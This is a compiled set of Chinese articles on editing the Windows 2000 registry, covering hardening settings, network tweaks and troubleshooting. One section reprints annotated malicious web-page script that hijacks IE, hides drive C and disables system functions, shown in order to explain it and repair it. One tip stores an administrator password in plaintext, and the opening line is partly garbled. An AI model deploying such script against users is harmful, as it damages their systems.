启动程序,在程序左边的树形列表窗口中选择将在其下添加新项的项或子项。单击程序界面菜单条中的“编辑 睿⒋庸亓南吕说ブ醒≡瘛疤砑酉睢泵睿耸被岢鱿秩缤?所示界面。
在图2所示窗口中的“项名称”文本框中输入需要添加的新项名称,对于指定类别,可根据自己的需要设置,当然如果不添加也可以。最后单击确定按钮,返回程序界面即可。
如果需要在HKEY_USERS或HKEY_LOCAL_MACHINE主项中添加新的内容,方法有所不同,此时“编辑”菜单中的“添加项”命令是不允许使用的。正确的添加方法是:单击程序界面菜单条“文件”项下拉菜单中的“加载配置单元”命令,程序会给出一个列表框,在其中选择需要加载的对象,之后单击“打开”按钮,程序会给出“加载配置单元”对话框,在其中输入新建项目名称,之后单击确定按钮即可。在此需要说明的是,加载配置单元主要用于在不同的机器中传递注册表配置,对于配置相同的机器,这样可以节省系统配置时间。
3.给注册表的值项赋值
所谓值项,就是注册表中的含数据字符串的子项,这个设置以字符串方式体现,常见的设置取值包括二进制数值和字符串明码以及DWORD(双字节)值方式。给值项赋值的具体步骤是:首先在注册表编辑器界面左边窗口中选择需要赋值的项或子项,从程序界面菜单条“编辑”项下拉菜单中选择“添加数值”命令,此时会出现如图3所示界面。在其中的“数值名称”文本框中输入需要创建的值项(子项)名,在“数据类型”下拉文本框中选择赋值类型,其中各列表项的含义为:
●REG_BINARY:二进制值;
●REG_DWORD:DWORD值;
●REG_EXPAND_SZ:可扩展字符串;
●REG_MULTI_SZ:多重字符串;
●REG_SZ:数据字符串。
根据自己的需要选择,之后,单击确定按钮。注意,选择的赋值类型不同,程序会给出关联的设置界面,在其中设置具体取值,之后进行确定就可以了。
如果需要修改或编辑值项的赋值,可使用鼠标双击程序界面右边窗口中的赋值列表项,程序会给出相应的赋值编辑器,在其中进行编辑或修改即可,非常简单。
4.以关键字方式查找
由于注册表中包括的项目非常多,当需要从中定位自己需要的项或子项时,使用查找功能是非常必要的。该项功能的具体用法如下:首先在程序界面中选择需要扫描的项或子项所在窗口,单击界面菜单条“察看”项下拉菜单中的“搜索项”命令,此时会出现如图4所示界面。在“查找内容”文本框中输入需要查找的内容关键字,并选择相应的扫描控制方式,之后,单击“查找下一个”按钮确定即可。
5.删除注册表中无用的子项或值项
虽然现在的应用程序都设计有自动卸载功能,但是多数程序并不能完全将自己在注册表中添加的项目删除,这也会导致注册表日益增大,时间长了会导致系统运行变慢等不良现象发生。如果你大致了解注册表的组成,可以将这些无用的设置从注册表中删除,当然这项操作具有一定的风险,使用前应该备份注册表数据文件。对于删除注册表中的项目,非常简单:首先在程序界面中找到需要删除项目所在的主项窗口,然后定位需要删除的值项,一般对于软件注册项都包括在HKEY_CURRENT_USER项下的Software子项中。单击程序界面菜单条“编辑”项下拉菜单中的“删除”命令或者是直接按下“Delete”键,程序会给出删除确认对话框,单击“Yes”按钮确认即可。
此外,对于配置单元项,是不能直接删除的,须要按照如下方法操作:选择需要删除的配置单元列表项,之后从程序界面“文件”下拉菜单中选择“卸载配置单元”命令。
6.保存注册表项目
对于保存注册表项目,可按以下步骤操作:首先在程序界面中选择需要保存的注册表项目对象,之后从界面“文件”下拉菜单中选择“保存项”命令,程序会给出相应的对话框,在其中设置保存文件的文件名、保存路径,对于文件类型,应设置为“所有文件”,之后,单击界面中的“保存”按钮即可。由于Win2000的注册表编辑器根据不同的项给出了单独的窗口,所以,对于完整的保存注册表,须要依次保存相应的项。
7.还原注册表项目
对于还原注册表项目,我们可以理解为恢复注册表项目的备份设置,或者是还原注册表项目。使用该项功能的前提是以前我们对注册表项目进行了备份。该项功能的使用方法非常简单:首先选择需要还原的项目所在的项显示窗口,单击程序界面“文件”项下拉菜单中的“还原”命令,程序会给出一个对话框,在其中的文件列表窗口中选择需要还原的文件名,之后单击“打开”按钮确定即可。
在此要提醒的是,对于项目还原操作,将使用备份的注册表项完全替代当前注册表中原始位置的全部配置,而且会将当前注册表中需要还原位置的全部配置删除。
8.注册表的打开与关闭
当注册表编辑器启动后,程序会自动打开本机的注册表,以供编辑。不过作为Win2000提供的工具,程序提供了关于编辑远程计算机注册表功能,不过我们可以打开的项目限制为HKEY_USERS和HKEY_LOCAL_MACHINE。对于本地注册表窗口的关闭,可从“文件”项下拉菜单中选择“关闭”命令即可。
对于打开远端计算机的注册表,可以从“文件”项下拉菜单中选择“选择计算机”命令,在其中的计算机列表框中选择需要访问的机器名称,之后单击打开按钮确定即可。
9.设置注册表项的权限
设置权限是有效的保护注册表项目的重要方法,使用此项功能可以指定能打开该项的用户和组。以下给出具体设置步骤:首先在程序界面窗口中选择需要指定权限的项,单击界面“安全”项下拉菜单,从中选择“权限”命令,在“名称”列表框中选择需要设置权限的用户或组,如果暂时还没有添加,可单击“添加”按钮,在关联的“选择用户、计算机或组”设置界面中选择需要添加的对象。在界面中的“权限”项列表框中设置允许当前选择对象的使用权限,其中包括只读和完全控制(读写)。如果要给子项指派权限,并希望指派给父项的可继承权限能够应用于子项,请选中“允许将来自父系的可继承权限传播给该对象”复选框。此外,如果单击界面中的“高级”按钮,程序会给出针对当前授权注册表项访问控制设置,其中包括了更加严密的授权设置,如是否允许查询数值、设置数值、创建子项、枚举子项、通知、创建链接、删除、写入DAC、写入所有者、读取控制等,根据自己的需要选择即可。
禁用危险的远程注册表
各位使用Windows 2000的用户,当你在编辑注册表时,可曾留意注册表编辑器菜单中的“注册表→连接网络注册表”一项?微软此举的目的,主要是为了方便网络管理员对网络中的计算机进行管理,但如果被别有用心的用户对自己的计算机的注册表进行远程操作,那就非常危险了。而且在Windows 2000系统中,是默认允许远程注册表操作的,那么,如何禁用它呢?
点击“开始→设置→控制面板→管理工具→服务”,本地计算机上的所有服务都显示出来了,找到名称为“Remote Registry Service”、描述为“允许远程注册表操作”的服务,右键点击,选择“属性”。
在对话框“常规→启动类型”处选择“已禁用”就OK了!若你以后想启动此服务,选择“自动”即可。为了自己计算机的安全,赶快行动吧!
修改注册表加强Win 2000安全
1、设置生存时间
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters
DefaultTTL REG_DWORD 0-0xff(0-255 十进制,默认值128)
说明:指定传出IP数据包中设置的默认生存时间(TTL)值。TTL决定了IP数据包在到达目标前在网络中生存的最大时间。它实际上限定了IP数据包在丢弃前允许通过的路由器数量.有时利用此数值来探测远程主机操作系统。
2、防止ICMP重定向报文的攻击
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters
EnableICMPRedirects REG_DWORD 0x0(默认值为0x1)
说明:该参数控制Windows 2000是否会改变其路由表以响应网络设备(如路由器)发送给它的ICMP重定向消息,有时会被利用来干坏事.Win2000中默认值为1,表示响应ICMP重定向报文。
3、禁止响应ICMP路由通告报文
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Inter
faces\interface
PerformRouterDiscovery REG_DWORD 0x0(默认值为0x2)
说明:“ICMP路由公告”功能可造成他人计算机的网络连接异常,数据被窃听,计算机被用于流量攻击等严重后果.此问题曾导致校园网某些局域网大面积,长时间的网络异常。因此建议关闭响应ICMP路由通告报文.Win2000中默认值为2,表示当DHCP发送路由器发现选项时启用。
4、防止SYN洪水攻击
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters
SynAttackProtect REG_DWORD 0x2(默认值为0x0)
说明:SYN攻击保护包括减少SYN-ACK重新传输次数,以减少分配资源所保留的时间。路由缓存项资源分配延迟,直到建立连接为止.如果synattackprotect=2,则AFD的连接指示一直延迟到三路握手完成为止.注意,仅在TcpMaxHalfOpen和TcpMaxHalfOpenRetried设置超出范围时,保护机制才会采取措施。
5、禁止自动缺省共享(server版)
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\lanmanserver\parameters
AutoShareServer、REG_DWORD、0x0
6、禁止自动缺省共享(pro版)
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\lanmanserver\parameters
AutoShareWks、REG_DWORD、0x0
7、禁止空用户连接
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa
RestrictAnonymous(匿名连接的额外限制)REG_DWORD:
0":None, Rely on default permissions(无,取决于默认的权限)
"1":Do not allow enumeration of SAM accounts and shares(不允许枚举SAM账号和共享)
"2":No access without explicit anonymous permissions(没有显式匿名权限就不允许访问)
"0"这个值是系统默认的,没有任何限制,远程用户可以知道你机器上所有的账号、组信息、共享目录、网络传输列表(NetServerTransportEnum)等,对服务器来说这样的设置非常危险。"1"这个值是只允许非NULL用户存取SAM账号信息和共享信息。"2"这个值只有WIN2K才支持,需要注意的是,如果使用了这个值,就不能再共享资源了,所以还是推荐把数值设为"1"比较好。
8、不支持IGMP协议
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters
IGMPLevel REG_DWORD 0x0(默认值为0x2)
说明:记得Win9x下有个bug,就是用可以用IGMP使别人蓝屏,修改注册表可以修正这个bug.Win2000虽然没这个bug了,但IGMP并不是必要的,因此照样可以去掉。改成0后用route print将看不到那个讨厌的224.0.0.0项了。
9、设置arp缓存老化时间设置
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services:\Tcpip\Parameters
ArpCacheLife REG_DWORD 0-0xFFFFFFFF(秒数,默认值为120秒)
ArpCacheMinReferencedLife REG_DWORD 0-0xFFFFFFFF(秒数,默认值为600)
说明:如果ArpCacheLife大于或等于ArpCacheMinReferencedLife,则引用或未引用的ARP缓存项在ArpCacheLife秒后到期。如果ArpCacheLife小于ArpCacheMinReferencedLife,未引用项在ArpCacheLife秒后到期,而引用项在ArpCacheMinReferencedLife秒后到期。每次将出站数据包发送到项的IP地址时,就会引用ARP缓存中的项。
10、禁止死网关监测技术
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services:\Tcpip\Parameters
EnableDeadGWDetect REG_DWORD 0x0(默认值为ox1)
说明:如果你设置了多个网关,那么你的机器在处理多个连接有困难时,就会自动改用备份网关。有时候这并不是一项好主意,建议禁止死网关监测。
11、不支持路由功能
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services:\Tcpip\Parameters
IPEnableRouter REG_DWORD 0x0(默认值为0x0)
说明:把值设置为0x1可以使Win2000具备路由功能,由此带来不必要的问题。
12、做NAT时放大转换的对外端口最大值
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services:\Tcpip\Parameters
MaxUserPort REG_DWORD 5000-65534(十进制)(默认值0x1388--十进制为5000)
说明:当应用程序从系统请求可用的用户端口数时,该参数控制所使用的最大端口数。正常情况下,短期端口的分配数量为1024-5000。将该参数设置到有效范围以外时,就会使用最接近的有效数值(5000或65534)。使用NAT时建议把值放大点。
13、修改MAC地址
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Class\
找到右窗口的说明为"网卡"的目录,
比如说是{4D36E972-E325-11CE-BFC1-08002BE10318}
展开之,在其下的0000,0001,0002...的分支中找到"DriverDesc"的键值为你网卡的说明,比如说"DriverDesc"的值为"Intel(R) 82559 Fast Ethernet LAN on Motherboard"然后在右窗口新建一字符串值,名字为"Networkaddress",内容为你想要的MAC值,比如说是"004040404040"然后重起计算机,ipconfig /all看看。
“注册表错误”也出错
Windows是一个强大的图形界面操作系统,它不仅用“所见即所得”和菜单的操作方式方便了新用户的及早上手,而且还内置了大量的提示信息,在用户系统出现问题的时候,系统能够提示用户按照规范的提示一步步缩小问题的范围并最后解决问题。在实际的应用中,笔者也发现Windows存在一些和故障本身不相干的提示和警告,下面就是一例有关“注册表错误”提示的相关分析,供各位参考。
注册表错误是Windows系统中很常见的一个提示信息,产生的原因可能就在Windows的列举提示中,很多媒体上也有不少相关文章介绍其解决之道。但是这些提示或者解决方法是针对“注册表真正错误”而提出的。在很多时候Windows提示的“注册表错误”的信息是没有影儿的事,造成该假象一般是基于下面两种原因。一种原因是你的爱机的内存条质量有问题。因为内存条的质量不好,导致Windows在初始化进入图形界面的时候就会提示“注册表错误”。系统还提示你从备份恢复,当你备份恢复后,系统依然提示你错误依旧。另外一种原因就是在硬件系统过热的时候,比如因为室内空气温度过高或者电脑工作时间过长,相关的散热设施又没有及时将热量排出,此时Windows也会提示你“注册表错误”,随后还会发生死机等情况。如果你相信Windows的这种提示,真的从备份里恢复注册表信息,不但不能解决问题,而且还可能会给系统造成更大的危害。因为你不停的恢复信息,必定会加大CPU的工作量,发出更多的热量,甚至会烧毁其他配件。
所以,当你遇到Windows的注册表错误提示的时候,按照提示进行常规的恢复,如果确认自己操作无误,连续重复两次都无效,就应当考虑Windows是不是在说谎,想想在硬件方面是不是出了问题。笔者就有这种亲身经历,在确定是硬件故障后,首先换的是内存,还是不行。这时我发现电源风扇的声音很大,是不是电源散热不畅?我随后就换上了一台技展350PX电源。我看中的是该类电源的双风扇设计,即在进风口加装了一台8公分风扇,这样使空气流动速度加快,机箱内的热气会迅速抽出。而基于双风扇设计,必然会使电源内部受热量加大、增大噪音。对于这些问题,技展也已精心解决。首先此款电源所用的两个风扇均为高灵敏度温控低音风扇,风扇所带热敏电阻可根据机箱和电源内的不同温度来调节风扇的转速,其次加大进风口的进风,使电源入口风扇与出口风扇以不同速度运转,保证电源内部自身产生的热空气和由机箱内抽入的热空气都及时排出,这样做还避免了不必要的噪音。换上新电源,启动Windows,果然系统运行很正常。
总之,各位在遇到Windows系统反复相同的“注册表错误”提示时,如果按照系统提示要求,按标准步骤依然没有能解决问题,就要考虑Windows是不是在说谎,及早找到故障原因,以免酿成大错。
浏览网页注册表被修改之迷及解决办法
浏览网页会被修改注册表?千真万确!如果你去浏览过下面的网页:
www.find****.com/default.htm ,你真有生不如死的感觉!
进入该网页会被:
1.修改开始菜单
1)禁止“关闭系统”
2)禁止“运行”
3)禁止“注销”
2.隐藏C盘——你的C盘找不到了
3.禁止使用注册表编辑器regedit
4.禁止使用DOS程序
5.使系统无法进入“实模式”
6.禁止运行任何程序
7.将IE浏览器的首页改为
http://www.findfeel.com/,收藏夹中也被加入该网址。
那么这些功能恐怖的功能是如何实现的呢?原来,该网页是有人利用Java技术制作的含有有害代码的ActiveX网页文件。为让更多的人了解其危害,我查看了其源代码,将其主要部分列了出来,并加了详细的注释(文中有“注”字的部分是我加的注释)。
注:下面代码是将你的IE默认连接首页改为
http://www.findfeel.comShl.RegWrite ("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\
Start Page", "
http://www.findfeel.com/");
注:以下是该网页修改受害者的注册表项所用的招数
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion
\\Policies\\Explorer\\NoRun", 01, "REG_BINARY");
注:使受害者系统没有“运行”项,这样用户就不能通过注册表编辑器来修改该有害网页对系统注册表的修改。
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\
Policies\\Explorer\\NoClose", 01, "REG_BINARY");
注:使受害者系统没有“关闭系统”项
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\
Policies\\Explorer\\NoLogOff", 01, "REG_BINARY");
注:使受害者系统没有“注销”项
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\
Policies\\Explorer\\NoDrives", "00000004", "REG_DWORD");
注:使受害者系统没有逻辑驱动器C
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\
Policies\\WinOldApp\\ Disabled","REG_BINARY");
注:禁止运行所有的DOS应用程序;
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\
Policies\ \WinOldApp\\NoRealMode","REG_BINARY");
注:使系统不能启动到“实模式”(传统的DOS模式)下;
又注:进入该网页,它还会修改以下的注册表项,使WINDOWS系统登录时显示一个登录窗口(在MicroSoft网络用户登录之前)
Shl.RegWrite ("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\
Winlogon\\LegalNoticeCaption", "呜啦啦...");
注:这些代码会使窗口的标题是“呜啦啦…”
Shl.RegWrite ("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\
Winlogon\\LegalNoticeText", "欢迎你!你这个超级无敌大白痴!《呜啦啦...》故事开始了,按确定进入悲惨世界");
注:上面一行是会在窗口中显示出来的文字
注:下面两行代码修改注册表,使受害者所有的IE窗口都加上以下的标题:“呜啦啦…”
Shl.RegWrite ("HKLM\\Software\\Microsoft\\Internet Explorer\\Main\\
Window Title", "呜啦啦...");
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\
Window Title", "呜啦啦...");
注:到上面一行为止,完成了对受害者的注册表的所有修改!
注:下面代码用来将其网页增加到受害者的收藏夹中
var WF, Shor, loc;
WF = FSO.GetSpecialFolder(0);
loc = WF + "\\Favorites";
if(!FSO.FolderExists(loc))
{
loc = FSO.GetDriveName(WF) + "\\Documents and Settings\\
" + Net.UserName + "\\Favorites";
if(!FSO.FolderExists(loc))
{
return;
}
}
注:下面就是使其网页加入到你的收藏夹的具体代码
AddFavLnk(loc, "找到感觉
www.findfeel.com", "
http://www.findfeel.com");
由于代码很简单,又加了注释,相信你已经看明白是怎么回事了。那么如果不小心进入该网页,并且已经中招了该怎么办呢?别急,下面给你列出了解决的办法。
受害用户的修复方法:
1:对于Win9x用户,建议在电脑启动时按F8键,选择到MS-DOS方式下,使用Scanreg/restore命令来恢复以前备份的、正常的注册表。
2:对于Win2000用户,把以下内容copy下来,存为unlock.reg文件,选带命令行的安全模式,用命令regedit unlock.reg导入,如何重启机器就OK了。
unlock.reg文件内容如下:
Windows Registry Editor Version 5.00
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\
Policies\Explorer]
"NoDriveTypeAutoRun"=dword:00000095
"NoRun"=hex:
"NoLogOff"=hex:
"NoDrives"=dword:00000000
"RestrictRun"=dword:00000000
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\
Policies\System]
"DisableRegistryTools"=dword:00000000
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\
Policies\System]
"DisableRegistryTools"=dword:00000000
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\
Policies\WinOldApp]
"Disabled"=dword:00000000
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\
Policies\WinOldApp]
"NoRealMode"=dword:00000000
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\
Winlogon]
"LegalNoticeCaption"=""
"LegalNoticeText"=""
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main]
"Window Title"="IE浏览器"
[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main]
"Window Title"="IE浏览器"
预防办法:
1.要避免中招,关键是不要轻易去一些自己并不了解的站点。
2.在IE设置中将ActiveX插件和控件、Java脚本等全部禁止
3.可以通过升级到最新的病毒库,来预防该类恶意网页的侵害。
4.既然该网页是通过修改注册表来破坏我们的系统,那么我们可以事先把注册表加锁:禁止修改注册表,这样就可以达到预防的目的。不过,自己要使用注册表编辑器regedit.exe该怎么办呢?因此我们还要在此前事先准备一把“钥匙”,以便打开这把“锁”!
加锁方法如下:
(1)运行注册表编辑器regedit.exe;
(2)展开注册表到HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\
Policies\System下,新建一个名为DisableRegistryTools的DWORD值,并将其值改为“1”,即可禁止使用注册表编辑器regedit.exe。
解锁方法如下:
用记事本编辑一个任意名字的.reg文件,比如unlock.reg,内容如下:
REGEDIT4
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\
Policies\System]
"DisableRegistryTools"=dword:00000000
存盘。你就有了一把解锁的钥匙了!如果要使用注册表编辑器,则双击unlock.reg即可。要注意的是,在“REGEDIT4”后面一定要空一行,并且“REGEDIT4”中的“4”和“T”之间一定不能有空格,否则将前功尽弃!
说明:对于“万花谷”网页的恶意代码带来的破坏,也可按上面所提的方法来预防,中招后也可参考上面的方法解决。另,KV3000对“万花谷”可完全恢复,对本文介绍的网页破坏系统现象,则无法安全恢复。
增强网络功能的另类招法—修改注册表
我们可以把注册表看成是一个庞大的数据库,它收集了系统所有软硬件的配置与状态信息以及与用户相关的各种设置信息,对系统的正常运行起着至关重要的作用。如果我们是网吧或者公共机房的系统维护员的话,就应该充分利用注册表在网络方面的特有功能,来加强局域网的实用性或者上网冲浪的效率。今天,笔者就注册表在网络方面上的应用搜集整理了一部分操作技巧,希望这些技巧能对大家有所用处。
1、在局域网中隐藏服务器
通常,我们在局域网中,利用网上邻居可以看到当前有哪些计算机正在工作,从而可以共享这些计算机上的资源。但在实践操作中,我们有时为了保证安全,特别是要保证局域网中服务器的安全,这时我们就希望在“网上邻居”中隐藏指定的服务器计算机名称。那么我们该如何 在“网上邻居”中隐藏一个服务器呢?其实,很简单,我们只要按照下面的步骤去操作就可以了:首先打开编辑器操作窗口,并在编辑器对话框中用鼠标依次单击如下分支:HKEY_LOCAL_ MACHINE\SYSTEM\ CurrentControlSet\Services\LanmanServer\Parameters键值。接着用鼠标单击该键值下面的Hidden数值名称,如果未发现此名称,那么添加一个,其数据类型为REG_DWORD。接下来用鼠标双击此项,在弹出的“DWORD编辑器”对话框中输入1即可。
2、修改浏览器中的搜索引擎
在注册表中依次展开“HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Search”,在右侧窗口中把“CustomizeSearch”、“SearchAssistant”改为我们定义的搜索引擎,如
http://www.sohu.com/,以后当我们每次点IE5.0的搜索引擎时,即可自动调出我们定义的搜索引擎,如上面设定的中国雅虎。
3、登录网超时自动断开与服务器的连接
我们常常需要登录到NT服务器上,但有可能不小心输错了登录参数或其他原因,导致了登录网络可能需要花费好长时间,这种情况是我们不想看到的。为了解决这种问题,我们可以通过注册表,来配置为闲置超时断开,以分钟为单位,具体步骤为:打开注册表编辑器窗口,并找到如下键值:[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters] ;然后在编辑器右边的列表中用鼠标选择“AUTODISCONNECT”键值;最后用鼠标双击“AUTODISCONNECT”键值,编辑器就会弹出一个名为“字符串编辑器”的对话框,在该对话框的文本栏中输入数值“1”,其中0代表取消自动断开功能,1代表使用自动断开功能。
4、改变浏览器窗口的动感效果
如果我们希望在打开或者关闭IE窗口时,被打开的窗口有动感效果,可以按照下面的步骤来修改注册表:首先打开注册表编辑器操作窗口,在该窗口中用鼠标依次单击键值HKEY_ CURRENT_USER / Control Panel/ desktop / WindowMetrics键值,并在右边的窗口中新建串值"Minanimat"与"Maxanimat"并设值为"0",为"1",这样在IE窗口最大最小化切换时有递变的效果。
5、提高网络访问速度
对于拨号用户来说,时间就是金钱,怎样才能节约时间,节省金钱呢?回答是提高网络传输速度。那又如何提高网络传输速度呢?大家知道,网络速度主要是受网络带宽限制的。增加带宽不是拨号用户所能做到的,他们唯一能做的就是把调制解调器的传输速度能够再提高一点。其实拨号用户还可以从计算机本身运行速度出发,尽量能挖掘计算机在网络加速方面最大的潜能。下面我们就通过一些设置来尽量加快网络传输速度,具体设置如下:首先在注册表编辑器窗口中依次展开以下的键值:[HKEY_LOCAL_MACHINE\System\Current Control Set\Services\Class\NetTrans\000n\,其中n表示个别拔号网络连接项号码,并在编辑器右边的列表框中,选择“MaxMTU”键值名称,如果没有上面的键值,可以利用“编辑”菜单中的“新建”键值命令添加一个,并选择所建数据类型为“DWORD”值;然后选择指定的键值并双击,当出现“字符串编辑器”对话框时,在“字符串”文本框中输入“576”,576代表最大传输单元值;接着在编辑器菜单栏中依次选择“编辑”→“新增”→“字符串值”,右边列表窗口就会多出一个新字符串,把它 命名为“MaxSSS”,再双按这个字符串值并把它设定为“536”;然后再依次展开如下键值:[HKEY_LOCAL_MACHINE\System\Current Control Set\Services\VxD\MSTCP];按照上述同样的操作方法,在编辑器右边的列表中依次添加字符串值“DefaultRcvWindow”、 “DefaultTTL”,并且把它们的数值分别设置为“2144”,“64”,最后重新启动计算机登录WINNT时,计算机将会发挥它在网络加速方面最大的能量。
6、更改浏览器的默认下载目录
大家如果经常用IE在网上下载文件就会知道,浏览器程序默认地会将下载内容存放到"C:\WINDOWS\Desktop"目录中,也就是放到Windows桌面上,时间一长就会将桌面搞得乱七八糟!有的用户为了保持桌面的整洁,同时希望能够有效地管理下载下来的文件,他们需要更改IE的默认下载目录,将其改为某个专门的下载文件夹,例如"C:\download"目录中。为此,我们只需启动Windows 98的注册表编辑器,并在编辑器窗口中用鼠标依次展开HKEY_CURRENT_USER \Software\Microsoft\Internet Explorer键值,此时我们就可以在Internet Explorer键值下发现一个名为"DownLoad Directory"的字符串值,其默认值为"C:\WINDOWS\Desktop"。它就是用于定义IE默认文件下载路径的,我们只需对其进行适当修改,例如将其改为"C:\download",此后再使用IE直接下载文件时,系统就会将文件直接保存到"C:\download"目录中了。
7、自动登陆服务器
通常情况下,用户在进入NT网络之前必须输入自己的用户名称以及口令。但是WINNT也提供了启动时自动以某一个组的用户名称和口令进行访问WINNT,而不需要通过人工设置的方法来输入登陆网络的参数。要实现自动登陆功能,必须要进行如下配置:首先在打开的注册表编辑器中,依次展开以下键值:[HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENT VERSION\WINLOGON],然后用鼠标单击右边的“AUTOADMINLOGON”键值名称,编辑器就会弹出一个名为“字符串编辑器”的对话框,在该对话框的文本栏中输入数值“1”;接着再用鼠标选择右边的“DEFAULTDOMAINNAME”键值名称,并在随后弹出的文本栏中输入所要登陆的域名名称或所要访问的计算机名称,例如输入“DOMAIN”域或“COM”计算机名称,然后单击“确定”按钮;按照同样的操作方法,选择右面的“DEFAULTUSERNAME”键值名称,并在“字符串”文本框中输入登陆网络的用户名称,例如输入管理员名称“ADMINISTRATOR”,并单击“确定”按钮;最后在注册表编辑器中,用鼠标单击“编辑”菜单并在下拉菜单中选择“新建键值”命令,然后在注册表右边的列表中,输入键值名称为“DEFAULTPASSWORD”,键值类型为“REG_SZ”,接着单击“确定”按钮;接下来再用鼠标双击“DEFAULTPASSWORD”键值,在弹出的对话框中输入用户的密码,在这里我们输入系统管理员的口令作为登陆网络的密码,输入完成后单击“确定”按钮结束设置工作。
8、禁止通过网络访问软盘
为了防止病毒入侵整个网络,导致整个网络处于瘫痪状态,所以我们必须严格管理计算机的输入设备,以断绝病毒的源头,为此就要禁止通过网络访问软盘。设置时,首先单击开始按钮,从弹出的菜单中选择运行命令;随后,程序将弹出一个运行对话框,在该对话框中输入regedit命令,然后在打开的注册表编辑器中依次打开键值[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon],在右边的窗口中看看有没有键值AllocateFloppies,如果没有请创建DWORD值,名字取为AllocateFloppies,把它的值修改为0或1,其中0代表可被域内所有管理员访问,1代表仅可被当地登陆者访问。
9、增加网址的自动识别功能
经常上网的朋友知道,我们要访问形如
www.aaa.com这样的网站时,只要在地址框中直接键入aaa,IE就会自动加上.com的后缀进行访问,省去了很多麻烦。但是如果我们想访问形如
www.aaa.com.cn这样的网站就没那么方便了,因为IE未包含.cn后缀的自动连接功能。那么我们能不能对IE的自动匹配功能进行扩充,使之能自动匹配".gov"、".net"、".com.cn"之类的后缀呢?回答是肯定的,我们只需启动Windows 98的注册表编辑器,并依次展开HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main\UrlTemplate分支,然后就可以在UrlTemplate分支下看到6个分别名为"1"、"2"……"6"字符串值,其键值分别为"
www.%s.com"、"%s.com"、"
www.%s.edu"、"%s.edu"……等,它们就是用于指定IE自动匹配范围的。广大用户若拟为IE增加新的自动匹配功能,只需在UrlTemplate分支下再新建两个字符串(如"7"和"8"),并将其值分别设置为"
www.%s.com.cn"和"%s.com.cn",然后就能让IE对".com.cn"后缀进行自动识别。当然我们还可采用此方法增加IE对".gov"、".net"等后缀的自动识别。
10、删除网页链接中的下划线
当我们打开一个IE页面时,会发现在超级链接下方有一划线,这主要是让用户更加容易分清超级链接与普通文本的区别。但有时我们为了达到某个版面效果,不希望看到在这些超级链接下有划线,而希望取消它们,这也是非常容易办到的!事实上,IE同时为下划线提供了三种不同的显示状态,它们分别是"始终显示下划线"、"始终不显示下划线"和"将鼠标放到超级链接上面的时候显示下划线",广大用户完全可根据自己的需要对其加以调整。具体来说,我们若拟对IE是否显示超级链接的下划线进行设置,则应启动Windows 98的注册表编辑器并依次展开HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main分支,然后就可以看到一个名为"Ancher Underline"的字符串值,它就是用于设置是否显示超级链接的下划线的。当其值为NO时表示始终不显示下划线、为YES时表示始终显示下划线、为HOVER则表示通常不显示下划线,而将鼠标放到相应超级链接下面之后显示下划线,广大用户只需根据自己的需要加以更改即可。
需要注意的是,采用上面的方法修改的是系统默认值,也就是说只有当我们浏览的网站本身没有设置是否显示下划线时,系统才会按上述设置进行显示,若用户浏览的网站自己已经设置了是否显示下划线,IE将会按照相应网站自己的设置进行显示。
11、禁止他人访问历史信息
